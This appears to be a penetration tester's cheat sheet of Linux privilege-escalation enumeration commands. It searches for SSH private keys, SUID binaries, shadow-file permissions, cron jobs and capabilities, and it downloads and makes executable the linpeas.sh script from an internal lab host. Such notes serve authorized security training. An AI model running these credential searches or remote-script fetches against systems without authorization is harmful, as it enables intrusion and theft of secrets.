find / -group <groups> 2>/dev/null
find / -name id_rsa 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
ls -la /etc/passwd /etc/shadow
cat /etc/crontab
crontab -l
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
ss -anp
routel
cat /etc/iptables/rules.v4
ps -aux
ps -aux | grep cron <-- search for "root /usr/sbin/cron -f"
wget 192.168.45.x/linpeas.sh
curl 192.168.45.x/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
Search for exploits for sudo version